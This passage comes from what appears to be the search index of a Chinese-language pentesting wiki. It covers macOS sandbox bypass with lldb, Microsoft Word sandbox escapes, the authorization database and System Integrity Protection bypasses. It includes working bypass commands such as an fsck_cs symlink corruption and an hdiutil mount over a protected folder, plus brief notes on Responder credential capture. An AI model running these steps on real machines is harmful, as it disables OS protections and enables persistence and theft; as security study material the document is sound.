=\\\\n\\\\t\\\\\\"SECINITD_REGISTRATION_MESSAGE_SHORT_NAME_KEY\\\\\\" => { length = 4, contents = \\\\\\"sand\\\\\\" }\\\\n\\\\t\\\\\\"SECINITD_REGISTRATION_MESSAGE_IMAGE_PATHS_ARRAY_KEY\\\\\\" => { count = 42, capacity = 64, contents =\\\\n\\\\t\\\\t0: { length = 14, contents = \\\\\\"/tmp/lala/sand\\\\\\" }\\\\n\\\\t\\\\t1: { length = 22, contents = \\\\\\"/private/tmp/lala/sand\\\\\\" }\\\\n\\\\t\\\\t2: { length = 26, contents = \\\\\\"/usr/lib/libSystem.B.dylib\\\\\\" }\\\\n\\\\t\\\\t3: { length = 30, contents = \\\\\\"/usr/lib/system/libcache.dylib\\\\\\" }\\\\n\\\\t\\\\t4: { length = 37, contents = \\\\\\"/usr/lib/system/libcommonCrypto.dylib\\\\\\" }\\\\n\\\\t\\\\t5: { length = 36, contents = \\\\\\"/usr/lib/system/libcompiler_rt.dylib\\\\\\" }\\\\n\\\\t\\\\t6: { length = 33, contents = \\\\\\"/usr/lib/system/libcopyfile.dylib\\\\\\" }\\\\n\\\\t\\\\t7: { length = 35, contents = \\\\\\"/usr/lib/system/libcorecry\\"... # The 3 arg is the address were the XPC response will be stored\\n(lldb) register read x2\\nx2 = 0x000000016fdfd660 # Move until the end of the function\\n(lldb) finish # Read the response\\n## Check the address of the sandbox container in SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\\n(lldb) memory read -f p 0x000000016fdfd660 -c 1\\n0x16fdfd660: 0x0000600003d04000\\n(lldb) p (char *) xpc_copy_description(0x0000600003d04000)\\n(char *) $4 = 0x0000000100204280 \\" { count = 7, transaction: 0, voucher = 0x0, contents =\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_CONTAINER_ID_KEY\\\\\\" => { length = 22, contents = \\\\\\"xyz.hacktricks.sandbox\\\\\\" }\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_QTN_PROC_FLAGS_KEY\\\\\\" => : 2\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\\\\\\" => { length = 65, contents = \\\\\\"/Users/carlospolop/Library/Containers/xyz.hacktricks.sandbox/Data\\\\\\" }\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_SANDBOX_PROFILE_DATA_KEY\\\\\\" => : { length = 19027 bytes, contents = 0x0000f000ba0100000000070000001e00350167034d03c203... }\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_VERSION_NUMBER_KEY\\\\\\" => : 1\\\\n\\\\t\\\\\\"SECINITD_MESSAGE_TYPE_KEY\\\\\\" => : 2\\\\n\\\\t\\\\\\"SECINITD_REPLY_FAILURE_CODE\\\\\\" => : 0\\\\n}\\" # To bypass the sandbox we need to skip the call to __mac_syscall\\n# Lets put a breakpoint in __mac_syscall when x1 is 0 (this is the code to enable the sandbox)\\n(lldb) breakpoint set --name __mac_syscall --condition \'($x1 == 0)\'\\n(lldb) c # The 1 arg is the name of the policy, in this case \\"Sandbox\\"\\n(lldb) memory read -f s $x0\\n0x19300eb22: \\"Sandbox\\" #\\n# BYPASS\\n# # Due to the previous bp, the process will be stopped in:\\nProcess 2517 stopped\\n* thread #1, queue = \'com.apple.main-thread\', stop reason = breakpoint 1.1\\nframe #0: 0x0000000187659900 libsystem_kernel.dylib`__mac_syscall\\nlibsystem_kernel.dylib`:\\n-> 0x187659900 <+0>: mov x16, #0x17d\\n0x187659904 <+4>: svc #0x80\\n0x187659908 <+8>: b.lo 0x187659928 ; <+40>\\n0x18765990c <+12>: pacibsp # To bypass jump to the b.lo address modifying some registers first\\n(lldb) breakpoint delete 1 # Remove bp\\n(lldb) register write $pc 0x187659928 #b.lo address\\n(lldb) register write $x0 0x00\\n(lldb) register write $x1 0x00\\n(lldb) register write $x16 0x17d\\n(lldb) c\\nProcess 2517 resuming\\nSandbox Bypassed!\\nProcess 2517 exited with status = 0 (0x00000000) [!WARNING] > 即使绕过了沙盒,TCC 仍会询问用户是否允许该进程读取桌面上的文件","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 使用 lldb 调试和绕过沙箱","id":"2620","title":"使用 lldb 调试和绕过沙箱"},"2621":{"body":"http://newosxbook.com/files/HITSB.pdf https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/ https://www.youtube.com/watch?v=mG715HcDgO8 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » References","id":"2621","title":"References"},"2622":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » macOS Office Sandbox Bypasses","id":"2622","title":"macOS Office Sandbox Bypasses"},"2623":{"body":"该应用程序使用 custom Sandbox 和权限 com.apple.security.temporary-exception.sbpl ,这个自定义沙箱允许在任何地方写入文件,只要文件名以 ~$ 开头:(require-any (require-all (vnode-type REGULAR-FILE) (regex #\\"(^|/)~$[^/]+$\\"))) 因此,逃逸的方式就是 编写一个 plist LaunchAgent 在 ~/Library/LaunchAgents/~$escape.plist 中。 查看 原始报告在这里 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox bypass via Launch Agents","id":"2623","title":"Word Sandbox bypass via Launch Agents"},"2624":{"body":"请记住,从第一次逃逸开始,Word 可以写入以 ~$ 开头的任意文件,尽管在之前漏洞的补丁后,无法在 /Library/Application Scripts 或 /Library/LaunchAgents 中写入。 发现从沙箱内可以创建一个 Login Item (用户登录时将执行的应用程序)。然而,这些应用程序 不会执行,除非 它们 经过公证 ,并且 无法添加参数 (因此不能仅使用 bash 运行反向 shell)。 在之前的沙箱绕过中,Microsoft 禁用了在 ~/Library/LaunchAgents 中写入文件的选项。然而,发现如果将 zip 文件作为 Login Item ,Archive Utility 将会 解压 到其当前位置。因此,由于默认情况下 ~/Library 中的 LaunchAgents 文件夹未创建,可以 将 plist 压缩到 LaunchAgents/~$escape.plist 并 放置 zip 文件到 ~/Library ,这样在解压时将到达持久性目标。 查看 原始报告在这里 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox bypass via Login Items and zip","id":"2624","title":"Word Sandbox bypass via Login Items and zip"},"2625":{"body":"(请记住,从第一次逃逸开始,Word 可以写入以 ~$ 开头的任意文件)。 然而,之前的技术有一个限制,如果 ~/Library/LaunchAgents 文件夹存在,因为其他软件创建了它,则会失败。因此发现了一个不同的 Login Items 链。 攻击者可以创建 .bash_profile 和 .zshenv 文件,包含要执行的有效载荷,然后将它们压缩并 写入受害者 的用户文件夹: ~/~$escape.zip 。 然后,将 zip 文件添加到 Login Items 中,然后是 Terminal 应用程序。当用户重新登录时,zip 文件将被解压到用户文件中,覆盖 .bash_profile 和 .zshenv ,因此,终端将执行其中一个文件(取决于使用的是 bash 还是 zsh)。 查看 原始报告在这里 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox bypass via Login Items and .zshenv","id":"2625","title":"Word Sandbox bypass via Login Items and .zshenv"},"2626":{"body":"从沙箱进程中,仍然可以使用 open 工具调用其他进程。此外,这些进程将在 它们自己的沙箱 中运行。 发现 open 工具有 --env 选项,可以使用 特定环境 变量运行应用程序。因此,可以在 沙箱内 的文件夹中创建 .zshenv 文件 ,并使用 open 和 --env 将 HOME 变量 设置为该文件夹,打开 Terminal 应用程序,这将执行 .zshenv 文件(出于某种原因,还需要设置变量 __OSINSTALL_ENVIROMENT)。 查看 原始报告在这里 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox Bypass with Open and env variables","id":"2626","title":"Word Sandbox Bypass with Open and env variables"},"2627":{"body":"open 工具还支持 --stdin 参数(在之前的绕过后,无法再使用 --env)。 问题是,即使 python 是由 Apple 签名的,它 不会执行 带有 quarantine 属性的脚本。然而,可以从 stdin 传递一个脚本,这样它就不会检查是否被隔离: 放置一个 ~$exploit.py 文件,包含任意 Python 命令。 运行 open –stdin=\'~$exploit.py\' -a Python ,这将使用我们放置的文件作为标准输入运行 Python 应用程序。Python 高兴地运行我们的代码,并且由于它是 launchd 的子进程,因此不受 Word 沙箱规则的限制。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox Bypass with Open and stdin","id":"2627","title":"Word Sandbox Bypass with Open and stdin"},"2628":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » macOS Authorizations DB & Authd","id":"2628","title":"macOS Authorizations DB & Authd"},"2629":{"body":"位于 /var/db/auth.db 的数据库用于存储执行敏感操作的权限。这些操作完全在 用户空间 中执行,通常由 XPC 服务 使用,这些服务需要检查 调用客户端是否被授权 执行某些操作,通过检查该数据库。 最初,该数据库是从 /System/Library/Security/authorization.plist 的内容创建的。然后,一些服务可能会添加或修改该数据库以添加其他权限。 规则存储在数据库中的 rules 表内,包含以下列: id : 每条规则的唯一标识符,自动递增,作为主键。 name : 规则的唯一名称,用于在授权系统中识别和引用它。 type : 指定规则的类型,仅限于值 1 或 2,以定义其授权逻辑。 class : 将规则分类为特定类别,确保它是正整数。 \\"allow\\" 表示允许,\\"deny\\" 表示拒绝,\\"user\\" 如果组属性指示一个允许访问的组,\\"rule\\" 表示在数组中需要满足的规则,\\"evaluate-mechanisms\\" 后跟一个 mechanisms 数组,这些机制可以是内置的或是 /System/Library/CoreServices/SecurityAgentPlugins/ 或 /Library/Security//SecurityAgentPlugins 中的一个包的名称。 group : 指示与规则相关联的用户组,用于基于组的授权。 kofn : 表示 \\"k-of-n\\" 参数,确定必须满足的子规则数量。 timeout : 定义规则授予的授权在多少秒后过期。 flags : 包含各种标志,以修改规则的行为和特征。 tries : 限制允许的授权尝试次数,以增强安全性。 version : 跟踪规则的版本,以便进行版本控制和更新。 created : 记录规则创建时的时间戳,以便审计。 modified : 存储对规则进行的最后修改的时间戳。 hash : 保存规则的哈希值,以确保其完整性并检测篡改。 identifier : 提供唯一的字符串标识符,例如 UUID,以供外部引用规则。 requirement : 包含序列化数据,定义规则的特定授权要求和机制。 comment : 提供关于规则的可读描述或注释,以便于文档和清晰性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » 授权数据库","id":"2629","title":"授权数据库"},"263":{"body":"伪造 DHCP 响应可以永久中毒受害者的路由信息,提供比 ARP 中毒更隐蔽的替代方案。 这需要对目标网络配置的精确了解。 运行攻击:./Responder.py -I eth0 -Pdv 这种方法可以有效捕获 NTLMv1/2 哈希,但需要小心处理以避免网络中断。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 使用 Responder 进行 DHCP 中毒","id":"263","title":"使用 Responder 进行 DHCP 中毒"},"2630":{"body":"bash # List by name and comments\\nsudo sqlite3 /var/db/auth.db \\"select name, comment from rules\\" # Get rules for com.apple.tcc.util.admin\\nsecurity authorizationdb read com.apple.tcc.util.admin\\n\\n\\n\\n\\nclass\\nrule\\ncomment\\nFor modification of TCC settings.\\ncreated\\n701369782.01043606\\nmodified\\n701369782.01043606\\nrule\\n\\nauthenticate-admin-nonshared\\n\\nversion\\n0\\n\\n 此外,在 https://www.dssw.co.uk/reference/authorization-rights/authenticate-admin-nonshared/ 可以查看 authenticate-admin-nonshared 的含义: json {\\n\\"allow-root\\": \\"false\\",\\n\\"authenticate-user\\": \\"true\\",\\n\\"class\\": \\"user\\",\\n\\"comment\\": \\"Authenticate as an administrator.\\",\\n\\"group\\": \\"admin\\",\\n\\"session-owner\\": \\"false\\",\\n\\"shared\\": \\"false\\",\\n\\"timeout\\": \\"30\\",\\n\\"tries\\": \\"10000\\",\\n\\"version\\": \\"1\\"\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » 示例","id":"2630","title":"示例"},"2631":{"body":"它是一个守护进程,将接收请求以授权客户端执行敏感操作。它作为一个在 XPCServices/ 文件夹中定义的 XPC 服务工作,并将日志写入 /var/log/authd.log。 此外,使用安全工具可以测试许多 Security.framework API。例如,运行 AuthorizationExecuteWithPrivileges:security execute-with-privileges /bin/ls 这将以 root 身份分叉并执行 /usr/libexec/security_authtrampoline /bin/ls,这将提示请求权限以 root 身份执行 ls: tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » Authd","id":"2631","title":"Authd"},"2632":{"body":"Reading time: 19 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » macOS SIP","id":"2632","title":"macOS SIP"},"2633":{"body":"系统完整性保护 (SIP) 在 macOS 中是一种机制,旨在防止即使是最特权的用户也对关键系统文件夹进行未经授权的更改。此功能在通过限制在受保护区域内添加、修改或删除文件等操作来维护系统的完整性方面发挥着至关重要的作用。SIP 保护的主要文件夹包括: /System /bin /sbin /usr 管理 SIP 行为的规则定义在位于 /System/Library/Sandbox/rootless.conf 的配置文件中。在此文件中,以星号 (*) 开头的路径被视为对其他严格 SIP 限制的例外。 考虑以下示例: javascript /usr\\n* /usr/libexec/cups\\n* /usr/local\\n* /usr/share/man 这个片段暗示,虽然 SIP 通常保护 /usr 目录,但有特定的子目录(/usr/libexec/cups、/usr/local 和 /usr/share/man)可以进行修改,正如它们路径前面的星号(*)所示。 要验证某个目录或文件是否受到 SIP 保护,可以使用 ls -lOd 命令检查是否存在 restricted 或 sunlnk 标志。例如: bash ls -lOd /usr/libexec/cups\\ndrwxr-xr-x 11 root wheel sunlnk 352 May 13 00:29 /usr/libexec/cups 在这种情况下, sunlnk 标志表示 /usr/libexec/cups 目录本身 无法被删除 ,尽管可以创建、修改或删除其中的文件。 另一方面: bash ls -lOd /usr/libexec\\ndrwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec 这里, restricted 标志表示 /usr/libexec 目录受到 SIP 保护。在 SIP 保护的目录中,无法创建、修改或删除文件。 此外,如果一个文件包含 com.apple.rootless 扩展 属性 ,该文件也将受到 SIP 保护 。 tip 请注意, Sandbox 钩子 hook_vnode_check_setextattr 阻止任何尝试修改扩展属性 com.apple.rootless 的行为。 SIP 还限制其他根操作 ,例如: 加载不受信任的内核扩展 获取 Apple 签名进程的任务端口 修改 NVRAM 变量 允许内核调试 选项以位标志的形式保存在 nvram 变量中(在 Intel 上为 csr-active-config,在 ARM 上从启动的设备树中读取 lp-sip0)。您可以在 csr.sh 中找到这些标志:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 基本信息","id":"2633","title":"基本信息"},"2634":{"body":"您可以使用以下命令检查系统是否启用了 SIP: bash csrutil status 如果您需要禁用 SIP,您必须在恢复模式下重启计算机(在启动时按 Command+R),然后执行以下命令: bash csrutil disable 如果您希望保持 SIP 启用但移除调试保护,可以使用: bash csrutil enable --without debug","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » SIP 状态","id":"2634","title":"SIP 状态"},"2635":{"body":"禁止加载未签名的内核扩展 (kexts),确保只有经过验证的扩展与系统内核交互。 防止调试 macOS 系统进程,保护核心系统组件免受未经授权的访问和修改。 抑制工具 如 dtrace 检查系统进程,进一步保护系统操作的完整性。 在此演讲中了解更多关于 SIP 的信息 .","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 其他限制","id":"2635","title":"其他限制"},"2636":{"body":"com.apple.rootless.xpc.bootstrap: 控制 launchd com.apple.rootless.install[.heritable]: 访问文件系统 com.apple.rootless.kext-management: kext_request com.apple.rootless.datavault.controller: 管理 UF_DATAVAULT com.apple.rootless.xpc.bootstrap: XPC 设置能力 com.apple.rootless.xpc.effective-root: 通过 launchd XPC 获取 root 权限 com.apple.rootless.restricted-block-devices: 访问原始块设备 com.apple.rootless.internal.installer-equivalent: 不受限制的文件系统访问 com.apple.rootless.restricted-nvram-variables[.heritable]: 完全访问 NVRAM com.apple.rootless.storage.label: 修改由 com.apple.rootless xattr 限制的文件,使用相应的标签 com.apple.rootless.volume.VM.label: 在卷上维护 VM 交换","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 与 SIP 相关的权限","id":"2636","title":"与 SIP 相关的权限"},"2637":{"body":"绕过 SIP 使攻击者能够: 访问用户数据 :读取所有用户帐户的敏感用户数据,如邮件、消息和 Safari 历史记录。 TCC 绕过 :直接操纵 TCC(透明性、同意和控制)数据库,以授予对网络摄像头、麦克风和其他资源的未经授权访问。 建立持久性 :在 SIP 保护的位置放置恶意软件,使其即使在 root 权限下也难以删除。这还包括篡改恶意软件删除工具(MRT)的潜在能力。 加载内核扩展 :尽管有额外的保护措施,绕过 SIP 简化了加载未签名内核扩展的过程。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » SIP 绕过","id":"2637","title":"SIP 绕过"},"2638":{"body":"使用 Apple 证书签名的安装包 可以绕过其保护。这意味着即使是标准开发者签名的包,如果尝试修改 SIP 保护的目录,也会被阻止。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 安装包","id":"2638","title":"安装包"},"2639":{"body":"一个潜在的漏洞是,如果在 rootless.conf 中指定了一个文件但当前不存在 ,则可以创建该文件。恶意软件可以利用这一点在系统上 建立持久性 。例如,如果恶意程序在 rootless.conf 中列出但不存在,它可以在 /System/Library/LaunchDaemons 中创建一个 .plist 文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 不存在的 SIP 文件","id":"2639","title":"不存在的 SIP 文件"},"264":{"body":"Responder 将使用上述协议冒充服务,当用户尝试对伪造的服务进行身份验证时捕获凭据(通常是 NTLMv2 挑战/响应)。 可以尝试降级到 NetNTLMv1 或禁用 ESS 以便于凭据破解。 重要的是要注意,使用这些技术应合法和道德,确保获得适当授权,避免干扰或未经授权的访问。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 使用 Responder 捕获凭据","id":"264","title":"使用 Responder 捕获凭据"},"2640":{"body":"caution 权限 com.apple.rootless.install.heritable 允许绕过 SIP CVE-2019-8561 发现可以在 系统验证其代码 签名后 交换安装包 ,然后系统将安装恶意包而不是原始包。由于这些操作是由 system_installd 执行的,因此可以绕过 SIP。 CVE-2020–9854 如果从挂载的映像或外部驱动器安装包, 安装程序 将 执行 来自 该文件系统 的二进制文件(而不是来自 SIP 保护的位置),使 system_installd 执行任意二进制文件。 CVE-2021-30892 - Shrootless 来自此博客文章的研究人员 发现了 macOS 的系统完整性保护(SIP)机制中的一个漏洞,称为 \'Shrootless\' 漏洞。该漏洞围绕 system_installd 守护进程,该进程具有权限 com.apple.rootless.install.heritable ,允许其任何子进程绕过 SIP 的文件系统限制。 system_installd 守护进程将安装由 Apple 签名的包。 研究人员发现,在安装 Apple 签名的包(.pkg 文件)时, system_installd 运行 包中包含的任何 后安装 脚本。这些脚本由默认 shell zsh 执行,如果存在,它会自动 运行 来自 /etc/zshenv 文件的命令,即使在非交互模式下。攻击者可以利用这种行为:通过创建恶意的 /etc/zshenv 文件并等待 system_installd 调用 zsh ,他们可以在设备上执行任意操作。 此外,发现 /etc/zshenv 可以作为一种通用攻击技术 ,不仅仅用于 SIP 绕过。每个用户配置文件都有一个 ~/.zshenv 文件,其行为与 /etc/zshenv 相同,但不需要 root 权限。该文件可以用作持久性机制,每次 zsh 启动时触发,或作为提升权限的机制。如果管理员用户使用 sudo -s 或 sudo 提升到 root,~/.zshenv 文件将被触发,有效地提升到 root。 CVE-2022-22583 在 CVE-2022-22583 中发现, system_installd 进程仍然可以被滥用,因为它将 后安装脚本放在 SIP 保护的 /tmp 中的随机命名文件夹内 。问题在于 /tmp 本身并不受 SIP 保护 ,因此可以在其上 挂载 一个 虚拟映像 ,然后 安装程序 会将 后安装脚本 放入其中, 卸载 虚拟映像, 重新创建 所有 文件夹 并 添加 带有 有效负载 的 后安装 脚本以执行。 fsck_cs 工具 发现了一个漏洞,其中 fsck_cs 被误导以破坏一个关键文件,因为它能够跟随 符号链接 。具体来说,攻击者从 /dev/diskX 创建了一个指向文件 /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist 的链接。在 /dev/diskX 上执行 fsck_cs 导致 Info.plist 的损坏。该文件的完整性对操作系统的 SIP(系统完整性保护)至关重要,SIP 控制内核扩展的加载。一旦损坏,SIP 管理内核排除的能力就会受到影响。 利用此漏洞的命令是: bash ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX\\nfsck_cs /dev/diskX 1>&-\\ntouch /Library/Extensions/\\nreboot 该漏洞的利用具有严重的影响。Info.plist 文件,通常负责管理内核扩展的权限,变得无效。这包括无法将某些扩展列入黑名单,例如 AppleHWAccess.kext。因此,随着 SIP 的控制机制失效,该扩展可以被加载,从而授予对系统 RAM 的未经授权的读写访问。 在 SIP 保护的文件夹上挂载 可以在 SIP 保护的文件夹上挂载新的文件系统以绕过保护 。 bash mkdir evil\\n# Add contento to the folder\\nhdiutil create -srcfolder evil evil.dmg\\nhdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg Upgrader bypass (2016) 系统设置为从 Install macOS Sierra.app 中的嵌入式安装程序磁盘映像启动以升级操作系统,利用 bless 工具。使用的命令如下: bash /usr/sbin/bless -setBoot -folder /Volumes/Macintosh HD/macOS Install Data -bootefi /Volumes/Macintosh HD/macOS Install Data/boot.efi -options config=\\"\\\\macOS Install Data\\\\com.apple.Boot\\" -label macOS Installer 该过程的安全性可能会受到威胁,如果攻击者在启动之前更改了升级映像(InstallESD.dmg)。该策略涉及用恶意版本(libBaseIA.dylib)替换动态加载器(dyld)。此替换导致在启动程序时执行攻击者的代码。 攻击者的代码在升级过程中获得控制权,利用系统对安装程序的信任。攻击通过通过方法调换(method swizzling)更改InstallESD.dmg映像,特别针对extractBootBits方法。这允许在使用磁盘映像之前注入恶意代码。 此外,在InstallESD.dmg中,有一个BaseSystem.dmg,它作为升级代码的根文件系统。将动态库注入其中允许恶意代码在能够更改操作系统级文件的进程中运行,显著增加了系统被攻陷的潜力。 systemmigrationd (2023) 在 DEF CON 31 的演讲中,展示了如何**systemmigrationd (可以绕过SIP)执行 bash 和 perl 脚本,这可以通过环境变量 BASH_ENV 和 PERL5OPT**被滥用。 CVE-2023-42860 正如 这篇博客文章中详细说明的 ,来自InstallAssistant.pkg包的postinstall脚本允许执行: bash /usr/bin/chflags -h norestricted \\"${SHARED_SUPPORT_PATH}/SharedSupport.dmg\\" 并且可以在 ${SHARED_SUPPORT_PATH}/SharedSupport.dmg 中创建一个符号链接,这将允许用户 解除任何文件的限制,绕过 SIP 保护 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » com.apple.rootless.install.heritable","id":"2640","title":"com.apple.rootless.install.heritable"},"2641":{"body":"caution 权限 com.apple.rootless.install 允许绕过 SIP 权限 com.apple.rootless.install 被认为可以绕过 macOS 的系统完整性保护 (SIP)。这在与 CVE-2022-26712 相关时特别提到。 在这个特定情况下,位于 /System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc 的系统 XPC 服务拥有此权限。这使得相关进程能够绕过 SIP 限制。此外,该服务显著提供了一种允许在不执行任何安全措施的情况下移动文件的方法。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » com.apple.rootless.install","id":"2641","title":"com.apple.rootless.install"},"2642":{"body":"密封系统快照是 Apple 在 macOS Big Sur (macOS 11) 中引入的一项功能,作为其 系统完整性保护 (SIP) 机制的一部分,以提供额外的安全性和系统稳定性。它们本质上是系统卷的只读版本。 以下是更详细的介绍: 不可变系统 :密封系统快照使 macOS 系统卷变得“不可变”,这意味着它无法被修改。这防止了任何未经授权或意外的更改,从而可能危及安全性或系统稳定性。 系统软件更新 :当您安装 macOS 更新或升级时,macOS 会创建一个新的系统快照。macOS 启动卷随后使用 APFS (Apple 文件系统) 切换到这个新快照。应用更新的整个过程变得更安全、更可靠,因为系统始终可以在更新过程中出现问题时恢复到先前的快照。 数据分离 :结合在 macOS Catalina 中引入的数据和系统卷分离的概念,密封系统快照功能确保您的所有数据和设置存储在一个单独的“ 数据 ”卷上。这种分离使您的数据独立于系统,从而简化了系统更新的过程并增强了系统安全性。 请记住,这些快照由 macOS 自动管理,并且由于 APFS 的空间共享能力,不会占用您磁盘上的额外空间。还需要注意的是,这些快照与 时间机器快照 不同,后者是用户可访问的整个系统的备份。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 密封系统快照","id":"2642","title":"密封系统快照"},"2643":{"body":"命令 diskutil apfs list 列出 APFS 卷的详细信息 及其布局: +-- Container disk3 966B902E-EDBA-4775-B743-CF97A0556A13\\n| ====================================================\\n| APFS Container Reference: disk3\\n| Size (Capacity Ceiling): 494384795648 B (494.4 GB)\\n| Capacity In Use By Volumes: 219214536704 B (219.2 GB) (44.3% used)\\n| Capacity Not Allocated: 275170258944 B (275.2 GB) (55.7% free)\\n| |\\n| +-< Physical Store disk0s2 86D4B7EC-6FA5-4042-93A7-D3766A222EBE\\n| | -----------------------------------------------------------\\n| | APFS Physical Store Disk: disk0s2\\n| | Size: 494384795648 B (494.4 GB)\\n| |\\n| +-> Volume disk3s1 7A27E734-880F-4D91-A703-FB55861D49B7\\n| | ---------------------------------------------------\\n| | APFS Volume Disk (Role): disk3s1 (System)\\n| | Name: Macintosh HD (Case-insensitive)\\n| | Mount Point: /System/Volumes/Update/mnt1\\n| | Capacity Consumed: 12819210240 B (12.8 GB)\\n| | Sealed: Broken\\n| | FileVault: Yes (Unlocked)\\n| | Encrypted: No\\n| | |\\n| | Snapshot: FAA23E0C-791C-43FF-B0E7-0E1C0810AC61\\n| | Snapshot Disk: disk3s1s1\\n| | Snapshot Mount Point: /\\n| | Snapshot Sealed: Yes\\n[...]\\n+-> Volume disk3s5 281959B7-07A1-4940-BDDF-6419360F3327\\n| ---------------------------------------------------\\n| APFS Volume Disk (Role): disk3s5 (Data)\\n| Name: Macintosh HD - Data (Case-insensitive) | Mount Point: /System/Volumes/Data | Capacity Consumed: 412071784448 B (412.1 GB) | Sealed: No\\n| 